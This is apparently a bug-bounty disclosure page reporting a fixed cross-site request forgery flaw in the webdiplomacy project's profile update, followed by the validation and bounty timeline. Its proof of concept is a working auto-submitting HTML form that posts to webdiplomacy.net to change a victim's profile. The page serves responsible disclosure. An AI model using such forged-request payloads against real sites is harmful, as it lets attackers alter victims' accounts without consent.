Cross-Site Request Forgery (CSRF) in kestasjk/webdiplomacy

Valid

Reported on

Jul 23rd 2021

✍️ Description

csrf bug to change user profile

🕵️‍♂️ Proof of Concept

I see there no csrf token checking when updating user-profile save bellow html code in html file and host this file . Now sent this file link to vicitm when victim open the link then his profile information will be changed .

<form action="https://webdiplomacy.net/usercp.php" method="post" id="myForm">
<input type=hidden name="userForm[comment]" value="yyyy">
  <input type="submit" value="Submit">
</form> 
<script>
document.getElementById("myForm").submit()
</script>

💥 Impact

attacker can change vicitm profile information when he open a malicious link

Occurrences

gameboard.php L51

We have contacted a member of the kestasjk/webdiplomacy team and are waiting to hear back 2 years ago

Kestas "Chris" Kuliukas validated this vulnerability 2 years ago

ranjit-git has been awarded the disclosure bounty

The fix bounty is now up for grabs

Kestas "Chris" Kuliukas marked this as fixed with commit e1b873 2 years ago

Kestas "Chris" Kuliukas has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the kestasjk/webdiplomacy team and are waiting to hear back 2 years ago

Kestas "Chris" Kuliukas validated this vulnerability 2 years ago

ranjit-git has been awarded the disclosure bounty

The fix bounty is now up for grabs

Kestas "Chris" Kuliukas marked this as fixed with commit e1b873 2 years ago

Kestas "Chris" Kuliukas has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation